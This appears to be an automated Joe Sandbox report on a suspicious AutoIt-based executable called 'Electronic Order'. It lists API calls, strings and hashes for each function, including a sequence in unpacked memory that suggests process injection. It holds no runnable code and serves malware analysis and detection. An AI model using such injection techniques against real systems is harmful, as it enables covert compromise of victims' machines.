                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1114 dc39e7-dc3a57 CreateWindowExW * 2 ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC3A15
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3A36
                                      • ShowWindow.USER32(00000000,?,?), ref: 00DC3A4A
                                      • ShowWindow.USER32(00000000,?,?), ref: 00DC3A53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: e5b09fd313be7be75bf9ed2c0e3205f7c64fb3cfca67b2306bc9e5314ef149a5
                                      • Instruction ID: b681298598724a4a21520114c2e934d9de00abff1eb79439152c6f1925127dee
                                      • Opcode Fuzzy Hash: e5b09fd313be7be75bf9ed2c0e3205f7c64fb3cfca67b2306bc9e5314ef149a5
                                      • Instruction Fuzzy Hash: 2EF03A706802907EEA3017237C0DF273E7DD7C7F51B01006AF908B6170C2A51805DBB0
                                      Function 015823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1115 15823b0-1582507 call 1580000 call 15822a0 CreateFileW 1122 1582509 1115->1122 1123 158250e-158251e 1115->1123 1124 15825be-15825c3 1122->1124 1126 1582520 1123->1126 1127 1582525-158253f VirtualAlloc 1123->1127 1126->1124 1128 1582541 1127->1128 1129 1582543-158255a ReadFile 1127->1129 1128->1124 1130 158255c 1129->1130 1131 158255e-1582598 call 15822e0 call 15812a0 1129->1131 1130->1124 1136 158259a-15825af call 1582330 1131->1136 1137 15825b4-15825bc ExitProcess 1131->1137 1136->1137 1137->1124
                                      APIs
                                        • Part of subcall function 015822A0: Sleep.KERNELBASE(000001F4), ref: 015822B1
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015824FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: DONBL4C73AXMVYX04A
                                      • API String ID: 2694422964-1570699908
                                      • Opcode ID: 0a7c3924eb397a78bbfaf2b8ec4d0615e911b16ad56c6c72b437803fa971cb3c
                                      • Instruction ID: eeadbb7aee36574f8809c64042c82791c0e481a535654e1bc9493512dc489552
                                      • Opcode Fuzzy Hash: 0a7c3924eb397a78bbfaf2b8ec4d0615e911b16ad56c6c72b437803fa971cb3c
                                      • Instruction Fuzzy Hash: 27519370E14249DBEF11DBE4C854BEEBBB5AF58300F004199E609BB2C1D7BA0B45CB65
                                      Function 00DE564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1139 de564d-de5666 1140 de5668-de566d 1139->1140 1141 de5683 1139->1141 1140->1141 1142 de566f-de5671 1140->1142 1143 de5685-de568b 1141->1143 1144 de568c-de5691 1142->1144 1145 de5673-de5678 call de8d68 1142->1145 1146 de569f-de56a3 1144->1146 1147 de5693-de569d 1144->1147 1157 de567e call de8ff6 1145->1157 1150 de56a5-de56b0 call de3020 1146->1150 1151 de56b3-de56b5 1146->1151 1147->1146 1149 de56c3-de56d2 1147->1149 1155 de56d9 1149->1155 1156 de56d4-de56d7 1149->1156 1150->1151 1151->1145 1154 de56b7-de56c1 1151->1154 1154->1145 1154->1149 1159 de56de-de56e3 1155->1159 1156->1159 1157->1141 1161 de57cc-de57cf 1159->1161 1162 de56e9-de56f0 1159->1162 1161->1143 1163 de56f2-de56fa 1162->1163 1164 de5731-de5733 1162->1164 1163->1164 1167 de56fc 1163->1167 1165 de579d-de579e call df0df7 1164->1165 1166 de5735-de5737 1164->1166 1174 de57a3-de57a7 1165->1174 1169 de575b-de5766 1166->1169 1170 de5739-de5741 1166->1170 1171 de57fa 1167->1171 1172 de5702-de5704 1167->1172 1177 de576a-de576d 1169->1177 1178 de5768 1169->1178 1175 de5743-de574f 1170->1175 1176 de5751-de5755 1170->1176 1173 de57fe-de5807 1171->1173 1179 de570b-de5710 1172->1179 1180 de5706-de5708 1172->1180 1173->1143 1174->1173 1183 de57a9-de57ae 1174->1183 1184 de5757-de5759 1175->1184 1176->1184 1182 de57d4-de57d8 1177->1182 1185 de576f-de577b call de4916 call df10ab 1177->1185 1178->1177 1181 de5716-de572f call df0f18 1179->1181 1179->1182 1180->1179 1198 de5792-de579b 1181->1198 1188 de57ea-de57f5 call de8d68 1182->1188 1189 de57da-de57e7 call de3020 1182->1189 1183->1182 1187 de57b0-de57c1 1183->1187 1184->1177 1200 de5780-de5785 1185->1200 1193 de57c4-de57c6 1187->1193 1188->1157 1189->1188 1193->1161 1193->1162 1198->1193 1201 de580c-de5810 1200->1201 1202 de578b-de578e 1200->1202 1201->1173 1202->1171 1203 de5790 1202->1203 1203->1198
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                      • String ID:
                                      • API String ID: 1559183368-0
                                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction ID: 0a920b27627c971385a35a90acd34806e44fb193a60d8cdc901edec887123f54
                                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                      • Instruction Fuzzy Hash: F251DB30A00B85DBDB24BF6AE84056E77A1EF403A8F68832DF865961D4D770DD608B70
                                      Function 00DC69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4F6F
                                      • _free.LIBCMT ref: 00DFE68C
                                      • _free.LIBCMT ref: 00DFE6D3
                                        • Part of subcall function 00DC6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DC6D0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                      • API String ID: 2861923089-1757145024
                                      • Opcode ID: d7489ac2e40f923c47caaa0ea69ddcdab38c2c73134261d6e73af03f784f88b1
                                      • Instruction ID: 31637f956330e1e806d3b515569f29eab6a70672081012d3b4259e9f72538164
                                      • Opcode Fuzzy Hash: d7489ac2e40f923c47caaa0ea69ddcdab38c2c73134261d6e73af03f784f88b1
                                      • Instruction Fuzzy Hash: 3191597191025EAFCF04EFA4D8919EDB7B4FF19314B14846EE915AB2A1DB30E944CBB0
                                      Function 00DC35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DC35A1,SwapMouseButtons,00000004,?), ref: 00DC35D4
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DC35A1,SwapMouseButtons,00000004,?,?,?,?,00DC2754), ref: 00DC35F5
                                      • RegCloseKey.KERNELBASE(00000000,?,?,00DC35A1,SwapMouseButtons,00000004,?,?,?,?,00DC2754), ref: 00DC3617
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: 11e725548e67b5ca645740d2485ca5f1c0a3a17b27becfc0a2be231bde49667e
                                      • Instruction ID: 13e8b7652fc7756b6f2cec7360b5b82b57304de34f5fe608a737b71a625ad726
                                      • Opcode Fuzzy Hash: 11e725548e67b5ca645740d2485ca5f1c0a3a17b27becfc0a2be231bde49667e
                                      • Instruction Fuzzy Hash: 11115775650209BFDB218F65DC80EEEBBB8EF45740F018469F805E7210E272AF459BB0
                                      Function 015812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01581A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01581AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01581B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125986808.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1580000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                      • Instruction ID: 51f155ef48d43e5c662fd5781109248d397a954207f22c0de88f449fba4d141c
                                      • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                      • Instruction Fuzzy Hash: 7E620A30A14658DBEB24DFA4C890BDEB772FF58300F1095A9D20DEB290E7759E81CB59
                                      Function 00E297E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC5045: _fseek.LIBCMT ref: 00DC505D
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AAE
                                        • Part of subcall function 00E299BE: _wcscmp.LIBCMT ref: 00E29AC1
                                      • _free.LIBCMT ref: 00E2992C
                                      • _free.LIBCMT ref: 00E29933
                                      • _free.LIBCMT ref: 00E2999E
                                        • Part of subcall function 00DE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DE9C64), ref: 00DE2FA9
                                        • Part of subcall function 00DE2F95: GetLastError.KERNEL32(00000000,?,00DE9C64), ref: 00DE2FBB
                                      • _free.LIBCMT ref: 00E299A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID:
                                      • API String ID: 1552873950-0
                                      • Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                                      • Instruction ID: fe424a7e9c954a8825a2116f5ee48cfda745a03b5e630ecb59a542e419ca2b8d
                                      • Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                                      • Instruction Fuzzy Hash: 665151B1904258AFDF249F65DC81A9EBBB9EF48310F14049EB609A7241DB715D80CF69
                                      Function 00DE493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction ID: 53283956dff9425c9f2d7bca29c4d4f1981475248a35ead35bdad423637f5655
                                      • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                      • Instruction Fuzzy Hash: 584116706007859BDF28EEABC8809AF77A6EF84374B28817DE859D7641D730DD408B74
                                      Function 00DC4DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: AU3!P/$EA06
                                      • API String ID: 4104443479-182974850
                                      • Opcode ID: e3e4af3ad8b463de0a0703456bdd47e8f84ba950f6447310c6f115d06515a418
                                      • Instruction ID: 6cf09ee932dc615f0e96614ee290d1f606bd3f14af5a7ea3f4f6041d80622325
                                      • Opcode Fuzzy Hash: e3e4af3ad8b463de0a0703456bdd47e8f84ba950f6447310c6f115d06515a418
                                      • Instruction Fuzzy Hash: 1A415C31A0425A5BDF215B649871FBE7FAAEF05300F2D416DFC82DB286C6219D8087B1
                                      Function 00DC73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00DFEE62
                                      • GetOpenFileNameW.COMDLG32(?), ref: 00DFEEAC
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                        • Part of subcall function 00DE09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE09F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen_memset
                                      • String ID: X
                                      • API String ID: 3777226403-3081909835
                                      • Opcode ID: fff360b5f46089dc605121758a0ad9ca0383c53a09dc3ebaa10564e4a3167fea
                                      • Instruction ID: 0fd33a572aec8baaf825b9990469d68ebf3c4a0b23be0206603272bd8d7661b3
                                      • Opcode Fuzzy Hash: fff360b5f46089dc605121758a0ad9ca0383c53a09dc3ebaa10564e4a3167fea
                                      • Instruction Fuzzy Hash: 4B21A130A042989BCB159F94C845BEE7BF8DF49300F04805AE508F7242DBB49A898FB1
                                      Function 00E2901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 9e9de2637f3e2363efe68033b9a3a968ea131003f22360d3fac43715dfa28d32
                                      • Instruction ID: 6642ad9085289a449b372e43c7a5f2d62253e301dd305f7576722d228585fde4
                                      • Opcode Fuzzy Hash: 9e9de2637f3e2363efe68033b9a3a968ea131003f22360d3fac43715dfa28d32
                                      • Instruction Fuzzy Hash: 2D01F9729042586EDB28D6A9D856EEE7BF8DB01305F00419AF552D2181E575A6048770
                                      Function 00E29B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00E29B82
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E29B99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: b305d3f0af124bfeaf81f7cff7809e9a609c098657fb63de9f3ea9562f2bbf7d
                                      • Instruction ID: 8129b7586cbbe53b93cfb2a7e4ec1bed585cb38c0e59f1a7350a2b6d8e865f4c
                                      • Opcode Fuzzy Hash: b305d3f0af124bfeaf81f7cff7809e9a609c098657fb63de9f3ea9562f2bbf7d
                                      • Instruction Fuzzy Hash: 00D05E7954030DAFDB109B91DC0EF9A772CE704B01F0042B1FE64A10A1EEF155998B95
                                      Function 00E3CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d12f12678d7ad772ba94ffd0c3d544bd885d6fb5d04bdfee2085f3d77434851
                                      • Instruction ID: fdeaaa882d4ca2d2f832aeebe9af9fc35a653a4c5fed7bed62c3007c0927ef37
                                      • Opcode Fuzzy Hash: 2d12f12678d7ad772ba94ffd0c3d544bd885d6fb5d04bdfee2085f3d77434851
                                      • Instruction Fuzzy Hash: 55F15870A083019FC714DF28D884A6ABBE5FF88314F14992EF899AB351D731E945CF92
                                      Function 00DE594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00DE5963
                                        • Part of subcall function 00DEA3AB: __NMSG_WRITE.LIBCMT ref: 00DEA3D2
                                        • Part of subcall function 00DEA3AB: __NMSG_WRITE.LIBCMT ref: 00DEA3DC
                                      • __NMSG_WRITE.LIBCMT ref: 00DE596A
                                        • Part of subcall function 00DEA408: GetModuleFileNameW.KERNEL32(00000000,00E843BA,00000104,?,00000001,00000000), ref: 00DEA49A
                                        • Part of subcall function 00DEA408: ___crtMessageBoxW.LIBCMT ref: 00DEA548
                                        • Part of subcall function 00DE32DF: ___crtCorExitProcess.LIBCMT ref: 00DE32E5
                                        • Part of subcall function 00DE32DF: ExitProcess.KERNEL32 ref: 00DE32EE
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      • RtlAllocateHeap.NTDLL(01590000,00000000,00000001,00000000,?,?,?,00DE1013,?), ref: 00DE598F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: 7a619b0b1350988842e9699db26ae33d84ec776f3dba2e8774a0bd2d319dcf56
                                      • Instruction ID: 748cce2f8ee7d01d4a19d096bb1b14108deae91512b9bfbf35af5d8fdca843b7
                                      • Opcode Fuzzy Hash: 7a619b0b1350988842e9699db26ae33d84ec776f3dba2e8774a0bd2d319dcf56
                                      • Instruction Fuzzy Hash: 2401F931201B92DED6117767FC417AD7248CF417B8F540026F405AB2D2DE709D015B75
                                      Function 00E29B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E297D2,?,?,?,?,?,00000004), ref: 00E29B45
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E297D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E29B5B
                                      • CloseHandle.KERNEL32(00000000,?,00E297D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E29B62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: 1a186793708bf9a79ffd08048c620ba3b4e1698196b96c69311a0b154e18349f
                                      • Instruction ID: 5fe8fac9e3851719af92764ff264a4c686a4ec9f01748178fcbba85e0d028d31
                                      • Opcode Fuzzy Hash: 1a186793708bf9a79ffd08048c620ba3b4e1698196b96c69311a0b154e18349f
                                      • Instruction Fuzzy Hash: 2DE08636181224BBDB211F55EC09FCA7B58AB06F65F104220FB54791E187B125169798
                                      Function 00E28F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00E28FA5
